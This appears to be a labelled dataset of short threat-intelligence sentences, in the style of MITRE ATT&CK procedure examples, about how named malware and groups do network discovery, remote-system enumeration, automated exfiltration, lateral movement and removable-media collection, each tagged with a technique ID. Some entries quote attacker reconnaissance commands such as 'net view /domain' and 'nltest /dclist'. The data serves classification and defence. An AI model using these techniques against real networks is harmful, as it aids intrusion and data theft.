{"text1":"KONNI can collect the IP address from the victim\u2019s machine.","labels":"['T1016']"}
|
|
{"text1":"Kazuar gathers information about network adapters.","labels":"['T1016']"}
|
|
{"text1":"Kobalos can record the IP address of the target machine.","labels":"['T1016']"}
|
|
{"text1":"Kwampirs collects network adapter and interface information by using the commands \"ipconfig \/all\", \"arp -a\" and \"route print\". It also collects the system's MAC address with \"getmac\" and domain configuration with \"net config workstation\".","labels":"['T1016']"}
|
|
{"text1":"Lazarus Group malware IndiaIndia obtains and sends to its C2 server information about the first network interface card\u2019s configuration, including IP address, gateways, subnet mask, DHCP information, and whether WINS is available.","labels":"['T1016']"}
|
|
{"text1":"LiteDuke has the ability to discover the proxy configuration of Firefox and\/or Opera.","labels":"['T1016']"}
|
|
{"text1":"Lizar can retrieve network information from a compromised host.","labels":"['T1016']"}
|
|
{"text1":"Lokibot has the ability to discover the domain name of the infected host.","labels":"['T1016']"}
|
|
{"text1":"LoudMiner used a script to gather the IP address of the infected machine before sending to the C2.","labels":"['T1016']"}
|
|
{"text1":"Lucifer can collect the IP address of a compromised host.","labels":"['T1016']"}
|
|
{"text1":"MacMa can collect IP addresses from a compromised host.","labels":"['T1016']"}
|
|
{"text1":"Machete collects the MAC address of the target computer and other network configuration information.","labels":"['T1016']"}
|
|
{"text1":"Magic Hound malware gathers the victim's local IP address, MAC address, and external IP address.","labels":"['T1016']"}
|
|
{"text1":"Milan can run `C:\\Windows\\system32\\cmd.exe \/c cmd \/c ipconfig \/all 2>&1` to discover network settings.","labels":"['T1016']"}
|
|
{"text1":"Mis-Type may create a file containing the results of the command \"cmd.exe \/c ipconfig \/all\".","labels":"['T1016']"}
|
|
{"text1":"MoonWind obtains the victim IP address.","labels":"['T1016']"}
|
|
{"text1":"More_eggs has the capability to gather the IP address from the victim's machine.","labels":"['T1016']"}
|
|
{"text1":"Mosquito uses the \"ipconfig\" command.","labels":"['T1016']"}
|
|
{"text1":"NETWIRE can collect the IP address of a compromised host.","labels":"['T1016']"}
|
|
{"text1":"NOKKI can gather information on the victim IP address.","labels":"['T1016']"}
|
|
{"text1":"Naid collects the domain name from a compromised host.","labels":"['T1016']"}
|
|
{"text1":"Naikon uses commands such as \"netsh interface show\" to discover network interface settings.","labels":"['T1016']"}
|
|
{"text1":"NanHaiShu can gather information about the victim proxy server.","labels":"['T1016']"}
|
|
{"text1":"Neoichor can gather the IP address from an infected host.","labels":"['T1016']"}
|
|
{"text1":"OSInfo discovers the current domain information.","labels":"['T1016']"}
|
|
{"text1":"OSX_OCEANLOTUS.D can collect the network interface MAC address on the infected host.","labels":"['T1016']"}
|
|
{"text1":"OceanSalt can collect the victim\u2019s IP address.","labels":"['T1016']"}
|
|
{"text1":"OilRig has run \"ipconfig \/all\" on a victim.","labels":"['T1016']"}
|
|
{"text1":"Okrum can collect network information, including the host IP address, DNS, and proxy information.","labels":"['T1016']"}
|
|
{"text1":"Olympic Destroyer uses API calls to enumerate the infected system's ARP table.","labels":"['T1016']"}
|
|
{"text1":"Operation Wocao has discovered the local network configuration with ipconfig.","labels":"['T1016']"}
|
|
{"text1":"Orz can gather victim proxy information.","labels":"['T1016']"}
|
|
{"text1":"POWERSTATS can retrieve IP, network adapter configuration information, and domain from compromised hosts.","labels":"['T1016']"}
|
|
{"text1":"POWRUNER may collect network configuration data by running \"ipconfig \/all\" on a victim.","labels":"['T1016']"}
|
|
{"text1":"Pay2Key can identify the IP and MAC addresses of the compromised host.","labels":"['T1016']"}
|
|
{"text1":"PcShare can obtain the proxy settings of a compromised machine using `InternetQueryOptionA` and its IP address by running `nslookup myip.opendns.com resolver1.opendns.com\\r\\n`.","labels":"['T1016']"}
|
|
{"text1":"Penquin can report the IP of the compromised host to attacker controlled infrastructure.","labels":"['T1016']"}
|
|
{"text1":"PingPull can retrieve the IP address of a compromised host.","labels":"['T1016']"}
|
|
{"text1":"PipeMon can collect and send the local IP address, RDP information, and the network adapter physical address as a part of its C2 beacon.","labels":"['T1016']"}
|
|
{"text1":"PoshC2 can enumerate network adapter information.","labels":"['T1016']"}
|
|
{"text1":"Proxysvc collects the network adapter information and domain\/username information based on current remote sessions.","labels":"['T1016']"}
|
|
{"text1":"Pysa can perform network reconnaissance using the Advanced IP Scanner tool.","labels":"['T1016']"}
|
|
{"text1":"QUADAGENT gathers the current domain the victim system belongs to.","labels":"['T1016']"}
|
|
{"text1":"QakBot can use \"net config workstation\", \"arp -a\", and \"ipconfig \/all\" to gather network configuration information.","labels":"['T1016']"}
|
|
{"text1":"RATANKBA gathers the victim\u2019s IP address via the \"ipconfig -all\" command.","labels":"['T1016']"}
|
|
{"text1":"Ramsay can use ipconfig and Arp to collect network configuration information, including routing information and ARP tables.","labels":"['T1016']"}
|
|
{"text1":"Reaver collects the victim's IP address.","labels":"['T1016']"}
|
|
{"text1":"RedLeaves can obtain information about network parameters.","labels":"['T1016']"}
|
|
{"text1":"Remsec can obtain information about network configuration, including the routing table, ARP cache, and DNS cache.","labels":"['T1016']"}
|
|
{"text1":"Revenge RAT collects the IP address and MAC address from the system.","labels":"['T1016']"}
|
|
{"text1":"Rifdoor has the ability to identify the IP address of the compromised host.","labels":"['T1016']"}
|
|
{"text1":"Rising Sun can detect network adapter and IP address information.","labels":"['T1016']"}
|
|
{"text1":"RogueRobin gathers the IP address and domain from the victim\u2019s machine.","labels":"['T1016']"}
|
|
{"text1":"Ryuk has called \"GetIpNetTable\" in an attempt to identify all mounted drives and hosts that have Address Resolution Protocol (ARP) entries.","labels":"['T1016']"}
|
|
{"text1":"S-Type has used `ipconfig \/all` on a compromised host.","labels":"['T1016']"}
|
|
{"text1":"SDBbot has the ability to determine the domain name and whether a proxy is configured on a compromised host.","labels":"['T1016']"}
|
|
{"text1":"SHARPSTATS has the ability to identify the domain of the compromised host.","labels":"['T1016']"}
|
|
{"text1":"STARWHALE has the ability to collect the IP address of an infected host.","labels":"['T1016']"}
|
|
{"text1":"Sandworm Team checks for connectivity to other resources in the network.","labels":"['T1016']"}
|
|
{"text1":"ShadowPad has collected the domain name of the victim system.","labels":"['T1016']"}
|
|
{"text1":"Shamoon obtains the target's IP address and local network segment.","labels":"['T1016']"}
|
|
{"text1":"Sibot checked if the compromised system is configured to use proxies.","labels":"['T1016']"}
|
|
{"text1":"SideCopy has identified the IP address of a compromised host.","labels":"['T1016']"}
|
|
{"text1":"SideTwist has the ability to collect the domain name on a compromised host.","labels":"['T1016']"}
|
|
{"text1":"Sidewinder has used malware to collect information on network interfaces, including the MAC address.","labels":"['T1016']"}
|
|
{"text1":"Small Sieve can obtain the IP address of a victim host.","labels":"['T1016']"}
|
|
{"text1":"SoreFang can collect the TCP\/IP, DNS, DHCP, and network adapter configuration on a compromised host via \"ipconfig.exe \/all\".","labels":"['T1016']"}
|
|
{"text1":"SpeakUp uses the \"ifconfig -a\" command.","labels":"['T1016']"}
|
|
{"text1":"SpicyOmelette can identify the IP of a compromised system.","labels":"['T1016']"}
{"text1":"Squirrelwaffle has collected the victim\u2019s external IP address.","labels":"['T1016']"}
{"text1":"Stealth Falcon malware gathers the Address Resolution Protocol (ARP) table from the victim.","labels":"['T1016']"}
{"text1":"Stuxnet collects the IP address of a compromised system.","labels":"['T1016']"}
{"text1":"Sys10 collects the local IP address of the victim and sends it to the C2.","labels":"['T1016']"}
{"text1":"T9000 gathers and beacons the MAC and IP addresses during installation.","labels":"['T1016']"}
{"text1":"TSCookie has the ability to identify the IP of the infected host.","labels":"['T1016']"}
{"text1":"Taidoor has collected the MAC address of a compromised host; it can also use \"GetAdaptersInfo\" to identify network adapters.","labels":"['T1016']"}
{"text1":"TajMahal has the ability to identify the MAC address on an infected host.","labels":"['T1016']"}
{"text1":"TeamTNT has enumerated the host machine\u2019s IP address.","labels":"['T1016']"}
{"text1":"The IceApple ifconfig module can iterate over all network interfaces on the host and retrieve the name, description, MAC address, DNS suffix, DNS servers, gateways, IPv4 addresses, and subnet masks.","labels":"['T1016']"}
{"text1":"Threat Group-3390 actors use NBTscan to discover vulnerable systems.","labels":"['T1016']"}
{"text1":"Torisma can collect the local MAC address using `GetAdaptersInfo` as well as the system's IP address.","labels":"['T1016']"}
{"text1":"Trojan.Karagany can gather information on the network configuration of a compromised host.","labels":"['T1016']"}
{"text1":"UPPERCUT has the capability to gather the victim's proxy information.","labels":"['T1016']"}
{"text1":"USBferry can detect the infected machine's network topology using \"ipconfig\" and \"arp\".","labels":"['T1016']"}
{"text1":"Unknown Logger can obtain information about the victim's IP address.","labels":"['T1016']"}
{"text1":"VERMIN gathers the local IP address.","labels":"['T1016']"}
{"text1":"Valak has the ability to identify the domain and the MAC and IP addresses of an infected machine.","labels":"['T1016']"}
{"text1":"Volgmer can gather the IP address from the victim's machine.","labels":"['T1016']"}
{"text1":"WannaCry will attempt to determine the local network segment it is a part of.","labels":"['T1016']"}
{"text1":"WellMail can identify the IP address of the victim system.","labels":"['T1016']"}
{"text1":"Wizard Spider has used \"ipconfig\" to identify the network configuration of a victim machine.","labels":"['T1016']"}
{"text1":"ZIRCONIUM has used a tool to enumerate proxy settings in the target environment.","labels":"['T1016']"}
{"text1":"Zebrocy runs the \"ipconfig \/all\" command.","labels":"['T1016']"}
{"text1":"ZeroT gathers the victim's IP address and domain information, and then sends it to its C2 server.","labels":"['T1016']"}
{"text1":"admin@338 actors used the following command after exploiting a machine with LOWBALL malware to acquire information about local networks: \"ipconfig \/all >> %temp%\\download\"","labels":"['T1016']"}
{"text1":"ifconfig can be used to display adapter configuration on Unix systems, including information for TCP\/IP, DNS, and DHCP.","labels":"['T1016']"}
{"text1":"ipconfig can be used to display adapter configuration on Windows systems, including information for TCP\/IP, DNS, and DHCP.","labels":"['T1016']"}
{"text1":"jRAT can gather victim internal and external IPs.","labels":"['T1016']"}
{"text1":"nbtstat can be used to discover local NetBIOS domain names.","labels":"['T1016']"}
{"text1":"route can be used to discover routing configuration information.","labels":"['T1016']"}
{"text1":"xCaon has used the GetAdaptersInfo() API call to get the victim's MAC address.","labels":"['T1016']"}
{"text1":"yty runs \"ipconfig \/all\" and collects the domain name.","labels":"['T1016']"}
{"text1":"zwShell can obtain the victim IP address.","labels":"['T1016']"}
{"text1":"During Operation Wocao, threat actors used a Visual Basic script that checked for internet connectivity.","labels":"['T1016.001']"}
{"text1":"GoldFinder performed HTTP GET requests to check internet connectivity and identify HTTP proxy servers and other redirectors that an HTTP request traveled through.","labels":"['T1016.001']"}
{"text1":"HEXANE has used tools including BITSAdmin to test internet connectivity from compromised hosts.","labels":"['T1016.001']"}
{"text1":"Neoichor can check for Internet connectivity by contacting bing[.]com with the request format `bing[.]com?id=<GetTickCount>`.","labels":"['T1016.001']"}
{"text1":"QakBot can measure the download speed on a targeted host.","labels":"['T1016.001']"}
{"text1":"QuietSieve can check C2 connectivity with a `ping` to 8.8.8.8 (Google public DNS).","labels":"['T1016.001']"}
{"text1":"Rising Sun can test a connection to a specified network IP address over a specified port number.","labels":"['T1016.001']"}
{"text1":"SUGARUSH has checked for internet connectivity from an infected host before attempting to establish a new TCP connection.","labels":"['T1016.001']"}
{"text1":"Turla has used \"tracert\" to check internet connectivity.","labels":"['T1016.001']"}
{"text1":"UNC2452 has used GoldFinder to perform HTTP GET requests to check internet connectivity and identify HTTP proxy servers and other redirectors that an HTTP request travels through.","labels":"['T1016.001']"}
{"text1":"APT29 has used AdFind to enumerate remote systems.","labels":"['T1018']"}
{"text1":"APT3 has a tool that can detect the existence of remote systems.","labels":"['T1018']"}
{"text1":"APT32 has enumerated DC servers using the command \"net group \"Domain Controllers\" \/domain\". The group has also used the \"ping\" command.","labels":"['T1018']"}
{"text1":"APT39 has used NBTscan and custom tools to discover remote systems.","labels":"['T1018']"}
{"text1":"AdFind has the ability to query Active Directory for computers.","labels":"['T1018']"}
{"text1":"BRONZE BUTLER typically uses \"ping\" and Net to enumerate systems.","labels":"['T1018']"}
{"text1":"Backdoor.Oldrea can enumerate and map ICS-specific systems in victim environments.","labels":"['T1018']"}
{"text1":"BitPaymer can use \"net view\" to discover remote systems.","labels":"['T1018']"}
{"text1":"BloodHound can enumerate and collect the properties of domain computers, including domain controllers.","labels":"['T1018']"}
{"text1":"Carbon uses the \"net view\" command.","labels":"['T1018']"}
{"text1":"Chimera has utilized various scans and queries to find domain controllers and remote services in the target environment.","labels":"['T1018']"}
{"text1":"Cobalt Strike uses the native Windows Network Enumeration APIs to interrogate and discover targets in a Windows Active Directory network.","labels":"['T1018']"}
{"text1":"Commands such as \"net view\" can be used in Net to gather information about available remote systems.","labels":"['T1018']"}
{"text1":"Comnie runs the \"net view\" command.","labels":"['T1018']"}
{"text1":"Conti has the ability to discover hosts on a target network.","labels":"['T1018']"}
{"text1":"DRATzarus can search for other machines connected to compromised host and attempt to map the network.","labels":"['T1018']"}
{"text1":"Diavol can use the ARP table to find remote hosts to scan.","labels":"['T1018']"}
{"text1":"During C0015, the threat actors used the commands `net view \/all \/domain` and `ping` to discover remote systems. They also used PowerView's PowerShell Invoke-ShareFinder script for file share enumeration.","labels":"['T1018']"}
{"text1":"During FunnyDream, the threat actors used several tools and batch files to map victims' internal networks.","labels":"['T1018']"}
{"text1":"During Operation CuckooBees, the threat actors used the `net view` and `ping` commands as part of their advanced reconnaissance.","labels":"['T1018']"}
{"text1":"Earth Lusca used the command \"powershell \u201cGet-EventLog -LogName security -Newest 500 | where {$_.EventID -eq 4624} | format-list -\nproperty * | findstr \u201cAddress\u201d\u201d\" to find the network information of successfully logged-in accounts to discover addresses of other machines. Earth Lusca has also used multiple scanning tools to discover other machines within the same compromised network.","labels":"['T1018']"}
{"text1":"Epic uses the \"net view\" command on the victim\u2019s machine.","labels":"['T1018']"}
{"text1":"FIN5 has used the open source tool Essential NetTools to map the network and build a list of targets.","labels":"['T1018']"}
{"text1":"FIN6 used publicly available tools (including Microsoft's built-in SQL querying tool, osql.exe) to map the internal network and conduct reconnaissance against Active Directory, Structured Query Language (SQL) servers, and NetBIOS.","labels":"['T1018', 'T1046']"}
{"text1":"FIN8 has used dsquery and other Active Directory utilities to enumerate hosts; they have also used \"nltest.exe \/dclist\" to retrieve a list of domain controllers.","labels":"['T1018']"}
{"text1":"Flagpro has been used to execute \"net view\" on a targeted system.","labels":"['T1018']"}
{"text1":"Fox Kitten has used Angry IP Scanner to detect remote systems.","labels":"['T1018']"}
{"text1":"GALLIUM used a modified version of NBTscan to identify available NetBIOS name servers over the network as well as \"ping\" to identify remote systems.","labels":"['T1018']"}
{"text1":"HEXANE has used `net view` to enumerate domain machines.","labels":"['T1018']"}
{"text1":"Indrik Spider has used PowerView to enumerate all Windows Server, Windows Server 2003, and Windows 7 instances in the Active Directory database.","labels":"['T1018']"}
{"text1":"Industroyer can enumerate remote computers in the compromised network.","labels":"['T1018']"}
{"text1":"Ke3chang has used network scanning and enumeration tools, including Ping.","labels":"['T1018']"}
{"text1":"Kwampirs collects a list of available servers with the command \"net view\".","labels":"['T1018']"}
{"text1":"MURKYTOP has the capability to identify remote hosts on connected networks.","labels":"['T1018']"}
{"text1":"NBTscan can list NetBIOS computer names.","labels":"['T1018']"}
{"text1":"Naikon has used a netbios scanner for remote machine identification.","labels":"['T1018']"}
{"text1":"Nltest may be used to enumerate remote domain controllers using options such as \"\/dclist\" and \"\/dsgetdc\".","labels":"['T1018']"}
{"text1":"OSInfo performs a connection test to discover remote systems in the network.","labels":"['T1018']"}
{"text1":"Olympic Destroyer uses Windows Management Instrumentation to enumerate all systems in the network.","labels":"['T1018']"}
{"text1":"Operation Wocao can use the \"ping\" command to discover remote systems.","labels":"['T1018']"}
{"text1":"Ping can be used to identify remote systems within a network.","labels":"['T1018']"}
{"text1":"PoetRAT used Nmap for remote system discovery.","labels":"['T1018']"}
{"text1":"QakBot can identify remote systems through the \"net view\" command.","labels":"['T1018']"}
{"text1":"RATANKBA runs the \"net view \/domain\" and \"net view\" commands.","labels":"['T1018']"}
{"text1":"ROADTools can enumerate Azure AD systems and devices.","labels":"['T1018']"}
{"text1":"SHOTPUT has a command to list all servers in the domain, as well as one to locate domain controllers on a domain.","labels":"['T1018']"}
{"text1":"SILENTTRINITY can enumerate and collect the properties of domain computers.","labels":"['T1018']"}
{"text1":"Sandworm Team has used a tool to query Active Directory using LDAP, discovering information about computers listed in AD.","labels":"['T1018']"}
{"text1":"Silence has used Nmap to scan the corporate network, build a network topology, and identify vulnerable hosts.","labels":"['T1018']"}
{"text1":"SpicyOmelette can identify payment systems, payment gateways, and ATM systems in compromised environments.","labels":"['T1018']"}
{"text1":"Sykipot may use \"net view \/domain\" to display hostnames of available systems on a network.","labels":"['T1018']"}
{"text1":"TRITON\u2019s TsLow Python module pings controllers over the TriStation protocol.","labels":"['T1018']"}
{"text1":"The TAINTEDSCRIBE command and execution module can perform target system enumeration.","labels":"['T1018']"}
{"text1":"Threat Group-3390 has used the \"net view\" command.","labels":"['T1018']"}
{"text1":"TrickBot can enumerate computers and network devices.","labels":"['T1018']"}
{"text1":"Turla surveys a system upon check-in to discover remote systems on a local network using the \"net view\" and \"net view \/DOMAIN\" commands. Turla has also used \"net group \"Domain Computers\" \/domain\", \"net group \"Domain Controllers\" \/domain\", and \"net group \"Exchange Servers\" \/domain\" to enumerate domain computers, including the organization's DC and Exchange Server.","labels":"['T1018']"}
{"text1":"WannaCry scans its local network segment for remote systems to try to exploit and copy itself to.","labels":"['T1018']"}
{"text1":"Wizard Spider has used networkdll for network discovery and psfin specifically for financial and point of sale indicators. Wizard Spider has also used AdFind and \"nltest\/dclist\" to enumerate domain computers, including the domain controller.","labels":"['T1018']"}
{"text1":"menuPass uses scripts to enumerate IP ranges on the victim network. menuPass has also issued the command \"net view \/domain\" to a PlugX implant to gather information about remote systems on the network.","labels":"['T1018']"}
{"text1":"njRAT can identify remote hosts on connected networks.","labels":"['T1018']"}
{"text1":"CosmicDuke exfiltrates collected files automatically over FTP to remote servers.","labels":"['T1020']"}
{"text1":"Crutch has automatically exfiltrated stolen files to Dropbox.","labels":"['T1020']"}
{"text1":"Doki has used a script that gathers information from a hardcoded list of IP addresses and uploads to an Ngrok URL.","labels":"['T1020']"}
{"text1":"During Frankenstein, the threat actors collected information via Empire, which was automatically sent back to the adversary's C2.","labels":"['T1020']"}
{"text1":"Ebury can automatically exfiltrate gathered SSH credentials.","labels":"['T1020']"}
{"text1":"Empire has the ability to automatically send collected data back to the threat actors' C2.","labels":"['T1020']"}
{"text1":"Frankenstein has collected information via Empire, which automatically sent the data back to the adversary's C2.","labels":"['T1020', 'T1041']"}
{"text1":"LightNeuron can be configured to automatically exfiltrate files under a specified directory.","labels":"['T1020']"}
{"text1":"OutSteel can automatically upload collected files to its C2 server.","labels":"['T1020']"}
{"text1":"Peppy has the ability to automatically exfiltrate files and keylogs.","labels":"['T1020']"}
{"text1":"Rover automatically searches for files on local drives based on a predefined list of file extensions and sends them to the command and control server every 60 minutes. Rover also automatically sends keylogger files and screenshots to the C2 server on a regular timeframe.","labels":"['T1020']"}
{"text1":"ShimRatReporter sent collected system and network information compiled into a report to an adversary-controlled C2.","labels":"['T1020']"}
{"text1":"Sidewinder has configured tools to automatically send collected files to attacker controlled servers.","labels":"['T1020']"}
{"text1":"StrongPity can automatically exfiltrate collected documents to the C2 server.","labels":"['T1020']"}
{"text1":"TajMahal has the ability to manage an automated queue of egress files and commands sent to its C2.","labels":"['T1020']"}
{"text1":"MacMa can manage remote screen sessions.","labels":"['T1021']"}
{"text1":"APT29 has used RDP sessions from public-facing systems to internal servers.","labels":"['T1021.001']"}
{"text1":"APT41 used RDP for lateral movement.","labels":"['T1021.001']"}
{"text1":"Axiom has used RDP during operations.","labels":"['T1021.001']"}
{"text1":"Blue Mockingbird has used Remote Desktop to log on to servers interactively and manually copy files to remote hosts.","labels":"['T1021.001']"}
{"text1":"Carbanak enables concurrent Remote Desktop Protocol (RDP) sessions.","labels":"['T1021.001']"}
{"text1":"Chimera has used RDP to access targeted systems.","labels":"['T1021.001']"}
{"text1":"Cobalt Group has used Remote Desktop Protocol to conduct lateral movement.","labels":"['T1021.001']"}
{"text1":"DarkComet can open an active screen of the victim\u2019s machine and take control of the mouse and keyboard.","labels":"['T1021.001']"}
{"text1":"Dragonfly 2.0 moved laterally via RDP.","labels":"['T1021.001']"}
{"text1":"Dragonfly has moved laterally via RDP.","labels":"['T1021.001']"}
{"text1":"FIN6 used RDP to move laterally in victim networks.","labels":"['T1021.001']"}
{"text1":"FIN7 has used RDP to move laterally in victim environments.","labels":"['T1021.001']"}
{"text1":"FIN8 has used RDP for lateral movement.","labels":"['T1021.001']"}
{"text1":"Fox Kitten has used RDP to log in and move laterally in the target environment.","labels":"['T1021.001']"}
{"text1":"Kimsuky has used RDP for direct remote point-and-click access.","labels":"['T1021.001']"}
{"text1":"Leviathan has targeted RDP credentials and used it to move through the victim environment.","labels":"['T1021.001']"}
{"text1":"Magic Hound has used Remote Desktop Services on targeted systems.","labels":"['T1021.001']"}
{"text1":"OilRig has used Remote Desktop Protocol for lateral movement. The group has also used tunneling tools to tunnel RDP into the environment.","labels":"['T1021.001']"}
{"text1":"Pupy can enable\/disable RDP connection and can start a remote desktop session using a browser web socket client.","labels":"['T1021.001']"}
{"text1":"QuasarRAT has a module for performing remote desktop access.","labels":"['T1021.001']"}
{"text1":"ServHelper has commands for adding a remote desktop user and sending RDP traffic to the attacker through a reverse SSH tunnel.","labels":"['T1021.001']"}
{"text1":"Silence has used RDP for lateral movement.","labels":"['T1021.001']"}
{"text1":"Stolen Pencil utilized RDP for direct remote point-and-click access.","labels":"['T1021.001']"}
{"text1":"TEMP.Veles utilized RDP throughout an operation.","labels":"['T1021.001']"}
{"text1":"The APT1 group is known to have used RDP during operations.","labels":"['T1021.001']"}
{"text1":"Wizard Spider has used RDP for lateral movement.","labels":"['T1021.001']"}
{"text1":"jRAT can support RDP control.","labels":"['T1021.001']"}
{"text1":"menuPass has used RDP connections to move across the victim network.","labels":"['T1021.001']"}
{"text1":"APT3 will copy files over to Windows Admin Shares (like ADMIN$) as part of lateral movement.","labels":"['T1021.002']"}
{"text1":"APT41 has transferred implant files using Windows Admin Shares.","labels":"['T1021.002']"}
{"text1":"Adversaries can instruct Duqu to spread laterally by copying itself to shares it has enumerated and for which it has obtained legitimate credentials (via keylogging or other means). The remote host is then infected by using the compromised credentials to schedule a task on remote machines that executes the malware.","labels":"['T1021.002', 'T1053.005', 'T1078']"}
{"text1":"Anchor can support Windows execution via SMB shares.","labels":"['T1021.002']"}
{"text1":"BlackEnergy has run a plug-in on a victim to spread through the local network by using PsExec and accessing admin shares.","labels":"['T1021.002']"}
{"text1":"Blue Mockingbird has used Windows Explorer to manually copy malicious files to remote hosts over SMB.","labels":"['T1021.002']"}
{"text1":"Chimera has used Windows admin shares to move laterally.","labels":"['T1021.002']"}
{"text1":"Cobalt Strike can use Windows admin shares (C$ and ADMIN$) for lateral movement.","labels":"['T1021.002']"}
{"text1":"Conficker variants spread through NetBIOS share propagation.","labels":"['T1021.002']"}
{"text1":"Conti can spread via SMB and encrypts files on different hosts, potentially compromising an entire network.","labels":"['T1021.002']"}
{"text1":"Deep Panda uses net.exe to connect to network shares using \"net use\" commands with compromised credentials.","labels":"['T1021.002']"}
{"text1":"Diavol can spread throughout a network via SMB prior to encryption.","labels":"['T1021.002']"}
{"text1":"FIN8 has attempted to map to C$ on enumerated hosts to test the scope of their current credentials\/context.","labels":"['T1021.002']"}
{"text1":"HermeticWizard can use a list of hardcoded credentials to authenticate via NTLMSSP to the SMB shares on remote systems.","labels":"['T1021.002']"}
{"text1":"Lateral movement can be done with Net through \"net use\" commands to connect to the on remote systems.","labels":"['T1021.002']"}
{"text1":"Lazarus Group malware SierraAlfa accesses the \"ADMIN$\" share via SMB to conduct lateral movement.","labels":"['T1021.002']"}
{"text1":"Moses Staff has used batch scripts that can enable SMB on a compromised host.","labels":"['T1021.002']"}
{"text1":"Net Crawler uses Windows admin shares to establish authenticated sessions to remote systems over SMB as part of lateral movement.","labels":"['T1021.002']"}
{"text1":"Olympic Destroyer uses PsExec to interact with the \"ADMIN$\" network share to execute commands on remote systems.","labels":"['T1021.002']"}
{"text1":"Operation Wocao has used Impacket's smbexec.py as well as accessing the C$ and IPC$ shares to move laterally.","labels":"['T1021.002']"}
{"text1":"Orangeworm has copied its backdoor across open network shares, including ADMIN$, C$WINDOWS, D$WINDOWS, and E$WINDOWS.","labels":"['T1021.002']"}
{"text1":"PsExec, a tool that has been used by adversaries, writes programs to the \"ADMIN$\" network share to execute commands on remote systems.","labels":"['T1021.002']"}
{"text1":"Sandworm Team has run \"net use\" to connect to network shares.","labels":"['T1021.002']"}
{"text1":"Shamoon accesses network share(s), enables share access to the target device, copies an executable payload to the target system, and uses a Scheduled Task\/Job to execute the malware.","labels":"['T1021.002']"}
{"text1":"Stuxnet propagates to available network shares.","labels":"['T1021.002']"}
{"text1":"The Regin malware platform can use Windows admin shares to move laterally.","labels":"['T1021.002']"}
{"text1":"Threat Group-1314 actors mapped network drives using \"net use\".","labels":"['T1021.002']"}
{"text1":"Turla used \"net use\" commands to connect to lateral systems within a network.","labels":"['T1021.002']"}
{"text1":"Wizard Spider has used SMB to drop Cobalt Strike Beacon on a domain controller for lateral movement.","labels":"['T1021.002']"}
{"text1":"Zox has the ability to use SMB for communication.","labels":"['T1021.002']"}
{"text1":"zwShell has been copied over network shares to move laterally.","labels":"['T1021.002']"}
{"text1":"Cobalt Strike can deliver \"beacon\" payloads for lateral movement by leveraging remote COM execution.","labels":"['T1021.003']"}
{"text1":"Cobalt Strike can deliver Beacon payloads for lateral movement by leveraging remote COM execution.","labels":"['T1021.003']"}
{"text1":"SILENTTRINITY can use `System` namespace methods to execute lateral movement using DCOM.","labels":"['T1021.003']"}
{"text1":"APT39 used secure shell (SSH) to move laterally among their targets.","labels":"['T1021.004']"}
{"text1":"BlackTech has used Putty for remote access.","labels":"['T1021.004']"}
{"text1":"Cobalt Strike can SSH to a remote service.","labels":"['T1021.004']"}
{"text1":"Empire contains modules for executing commands over SSH as well as in-memory VNC agent injection.","labels":"['T1021.004']"}
{"text1":"FIN7 has used SSH to move laterally through victim environments.","labels":"['T1021.004']"}
{"text1":"GCMAN uses Putty for lateral movement.","labels":"['T1021.004']"}
{"text1":"Kinsing has used SSH for lateral movement.","labels":"['T1021.004']"}
{"text1":"Lazarus Group used SSH and the PuTTy PSCP utility to gain access to a restricted segment of a compromised network.","labels":"['T1021.004']"}
{"text1":"Leviathan used ssh for internal reconnaissance.","labels":"['T1021.004']"}
{"text1":"TEMP.Veles has relied on encrypted SSH-based tunnels to transfer tools and for remote command\/program execution.","labels":"['T1021.004']"}
{"text1":"TeamTNT has used SSH to connect back to victim machines. TeamTNT has also used SSH to transfer tools and payloads onto victim hosts and execute them.","labels":"['T1021.004']"}
{"text1":"menuPass has used Putty Secure Copy Client (PSCP) to transfer data.","labels":"['T1021.004']"}
{"text1":"DanBot can use VNC for remote access to targeted systems.","labels":"['T1021.005']"}
{"text1":"FIN7 has used TightVNC to control compromised hosts.","labels":"['T1021.005']"}
{"text1":"Fox Kitten has installed TightVNC server and client on compromised servers and endpoints for lateral movement.","labels":"['T1021.005']"}
{"text1":"GCMAN uses VNC for lateral movement.","labels":"['T1021.005']"}
{"text1":"Gamaredon Group has used VNC tools, including UltraVNC, to remotely interact with compromised hosts.","labels":"['T1021.005']"}
{"text1":"ZxShell supports functionality for VNC sessions.","labels":"['T1021.005']"}
{"text1":"APT29 has used WinRM via PowerShell to execute command and payloads on remote hosts.","labels":"['T1021.006']"}
{"text1":"SILENTTRINITY tracks `TrustedHosts` and can move laterally to these targets via WinRM.","labels":"['T1021.006']"}
{"text1":"Threat Group-3390 has used WinRM to enable remote execution.","labels":"['T1021.006']"}
{"text1":"UNC2452 has used WinRM via PowerShell to execute command and payloads on remote hosts.","labels":"['T1021.006']"}
{"text1":"A Gamaredon Group file stealer has the capability to steal data from newly connected logical volumes on a system, including USB drives.","labels":"['T1025']"}
{"text1":"An APT28 backdoor may collect the entire contents of an inserted USB device.","labels":"['T1025']"}
{"text1":"AppleSeed can find and collect data from removable media devices.","labels":"['T1025']"}
{"text1":"Aria-body has the ability to collect data from USB devices.","labels":"['T1025']"}
{"text1":"BADNEWS copies files with certain extensions from USB devices to\na predefined directory.","labels":"['T1025']"}
{"text1":"Explosive can scan all .exe files located in the USB drive.","labels":"['T1025']"}
{"text1":"FLASHFLOOD searches for interesting files (either a default or customized set of file extensions) on removable media and copies them to a staging area. The default file types copied would include data copied to the drive by SPACESHIP.","labels":"['T1025']"}
{"text1":"GravityRAT steals files based on an extension list if a USB drive is connected to the system.","labels":"['T1025']"}
{"text1":"Machete had a module in its malware to find, encrypt, and upload files from fixed and removable drives.","labels":"['T1025']"}
{"text1":"ObliqueRAT has the ability to extract data from removable devices connected to the endpoint.","labels":"['T1025']"}
{"text1":"Once a removable media device is inserted back into the first victim, USBStealer collects data from it that was exfiltrated from a second victim.","labels":"['T1025']"}
{"text1":"Prikormka contains a module that collects documents with certain extensions from removable media or fixed drives connected via USB.","labels":"['T1025']"}
{"text1":"Ramsay can collect data from removable media and stage it for exfiltration.","labels":"['T1025']"}
{"text1":"Remsec has a package that collects documents from any inserted USB sticks.","labels":"['T1025']"}
{"text1":"TajMahal has the ability to steal written CD images and files of interest from previously connected removable drives when they become available again.","labels":"['T1025']"}
{"text1":"The FunnyDream FilePakMonitor component has the ability to collect files from removable devices.","labels":"['T1025']"}
{"text1":"Turla RPC backdoors can collect files from USB thumb drives.","labels":"['T1025']"}
{"text1":"JPIN uses an encrypted and compressed payload that is disguised as a bitmap within the resource section of the installer.","labels":"['T1027']"}
{"text1":"A RedLeaves configuration file is encrypted with a simple XOR key, 0x53.","labels":"['T1027']"}
